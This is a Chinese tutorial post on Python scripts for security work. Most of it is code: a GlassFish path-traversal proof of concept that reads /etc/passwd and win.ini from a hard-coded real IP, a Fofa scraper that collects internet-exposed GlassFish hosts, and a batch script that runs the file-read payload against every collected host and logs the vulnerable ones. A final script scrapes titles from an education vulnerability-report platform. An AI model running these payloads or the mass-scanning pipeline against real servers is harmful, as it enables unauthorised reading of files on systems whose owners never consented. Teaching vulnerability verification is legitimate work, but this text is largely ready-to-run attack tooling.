77:Python開發-批量Fofa&POC驗證&SRC提取
阿新 • • 發佈:2021-08-19
本課知識點:
- Request爬蟲技術,lxml資料提取,異常處理,fofa等使用說明
- 掌握利用公開或0day漏洞進行批量化的收集及驗證指令碼開發
案例1:某漏洞POC驗證指令碼
漏洞學習:
- 應用伺服器glassfish任意檔案讀取漏洞(https://www.secpulse.com/archives/42277.html)
# Author:Zhengna import requests def glassfish_vcheck(url): payload_linux = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwdglassfish任意檔案讀取漏洞POC" payload_windows = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/Windows/win.ini" data_linux = requests.get(url+payload_linux) #獲取請求後的返回原始碼 data_windows = requests.get(url+payload_windows) #獲取請求後的返回原始碼 statuscode_linux= data_linux.status_code #獲取請求後的返回狀態碼 statuscode_windows = data_windows .status_code #獲取請求後的返回狀態碼 if statuscode_linux == 200: print("glassfish任意檔案讀取漏洞存在") print(data_linux.text) elif statuscode_windows == 200: print("glassfish任意檔案讀取漏洞存在") print(data_windows.text)else: print("glassfish任意檔案讀取漏洞不存在") if __name__ == '__main__': #可以進入fofa網址,搜尋app="glassfish" && port="4848",找到可能存在漏洞的網站。 url = "http://3.0.49.154:4848" glassfish_vcheck(url) #連線異常可參考解決方法:https://blog.csdn.net/a1007720052/article/details/83383220
案例2:Fofa搜尋結果批量採集指令碼
1.手動採集
- 進入fofa網址(https://fofa.so/),搜尋"glassfish" && port="4848",找到可能存在漏洞的網站。
# Author:Serena import requests,base64,time from lxml import etree #提前安裝 lxml模組:python3 -m pip install lxml ''' 如何實現這個漏洞批量化: 1.獲取到可能存在漏洞的地址資訊-藉助Fofa進行獲取目標 1.1將請求的資料進行篩選 2.批量請求地址資訊進行判斷是否存在-單執行緒和多執行緒 ''' #非會員,只能收集10條 def ip_collect(): url = "https://fofa.so/result?qbase64=" search_data = '"glassfish" && port="4848" && country="CN" ' # search_data = '"glassfish" && port="4848" ' search_data_b64 = base64.b64encode(search_data.encode("utf-8")).decode("utf-8") urls = url+search_data_b64 result = requests.get(urls).content soup = etree.HTML(result) ip_data = soup.xpath('//span[@class = "aSpan"]/a[@target="_blank"]/@href') ip_data=set(ip_data) #去除重複的IP # print(ip_data) ipdata = '\n'.join(ip_data) with open(r'ip-10.txt','a+') as f: f.write(ipdata+'\n') #會員,可收集很多條 def ip_collect_vip(): search_data = '"glassfish" && port="4848"' search_data_b64 = base64.b64encode(search_data.encode("utf-8")).decode("utf-8") headers = { 'cookie':'_fofapro_ars_session=aaaaaaaaaaaaaaaaaaaaaaaaa' } for pageNumber in range(1,11): urls = "https://fofa.so/result?page="+str(pageNumber)+"&qbase64="+search_data_b64 print('正在提取第'+str(pageNumber)+'頁') try: result = requests.get(urls,headers=headers,timeout=0.5).content soup = etree.HTML(result) ip_data = soup.xpath('//span[@class = "aSpan"]/a[@target="_blank"]/@href') ip_data = set(ip_data) # 去除重複的IP print(ip_data) ipdata = '\n'.join(ip_data) with open(r'ip-200.txt','a+') as f: f.write(ipdata+'\n') except Exception as e: pass if __name__ == '__main__': ip_collect() # ip_collect_vip()Fofa批量提取
案例3:某漏洞POC批量驗證指令碼
# Author:Zhengna import time import requests def glassfish_vcheck(): payload_linux = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" payload_windows = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/Windows/win.ini" for url in open('ip-10.txt'): url = url.replace('\n', '') data_linux = requests.get(url + payload_linux) # 獲取請求後的返回原始碼 data_windows = requests.get(url + payload_windows) # 獲取請求後的返回原始碼 statuscode_linux = data_linux.status_code # 獲取請求後的返回狀態碼 statuscode_windows = data_windows.status_code # 獲取請求後的返回狀態碼 print("check->" + url) try: with open(r'vuln.txt', 'a+',encoding='utf8') as f: if statuscode_linux == 200: f.write("-----------------------------------------------\n") f.write(url + "存在glassfish任意檔案讀取漏洞\n") f.write(url + "是linux系統\n") # f.write(data_linux.text) elif statuscode_windows == 200: f.write("-----------------------------------------------\n") f.write(url + "存在glassfish任意檔案讀取漏洞\n") f.write(url + "是windows系統\n") # f.write(data_windows.text) else: f.write("-----------------------------------------------\n") f.write(url + "不存在glassfish任意檔案讀取漏洞\n") time.sleep(0.5) except Exception as e: pass if __name__ == '__main__': glassfish_vcheck()glassfish任意檔案讀取漏洞POC批量驗證
案例4:教育SRC報告平臺資訊批量提取指令碼
# Education-sector vulnerability report platform (Beta): https://src.sjtu.edu.cn/
# Author:zhengna
import requests,time
from lxml import etree


def src_collect(page: str) -> None:
    """Collect report titles from the education-sector SRC list pages.

    Requests ``https://src.sjtu.edu.cn/list/?page=1..page``, takes the text
    of ``td[class=""] > a`` cells via XPath, splits the joined text on
    whitespace, and appends each token on its own line to ``src-edu.txt``
    in the working directory.

    Args:
        page: number of list pages to fetch, passed through ``int()``
            (``__main__`` passes the raw ``input()`` string).

    Returns:
        None.

    The whole loop sits inside a single ``try``: any exception (including a
    non-numeric ``page`` failing ``int()``) sleeps 0.5 s, is swallowed, and
    the remaining pages are not fetched.  ``requests.get`` has no timeout.
    """
    try:
        for i in range(1, int(page) + 1):
            url = "https://src.sjtu.edu.cn/list/?page=" + str(i)
            print("正在提取第" + str(i) + "頁")
            r = requests.get(url).content
            soup = etree.HTML(r)
            result = soup.xpath('//td[@class=""]/a/text()')
            results = '\n'.join(result)
            # str.split() with no argument splits on any whitespace, so a
            # title containing spaces is written as several lines.
            resultss = results.split()
            for edu in resultss:
                # The output file is reopened for every token.
                with open(r'src-edu.txt', 'a+', encoding='utf-8') as f:
                    f.write(edu + '\n')
    except Exception as e:
        time.sleep(0.5)
        pass


if __name__ == '__main__':
    page = input("你需要提取幾頁?-->")
    src_collect(page)
    # (page caption) src_collect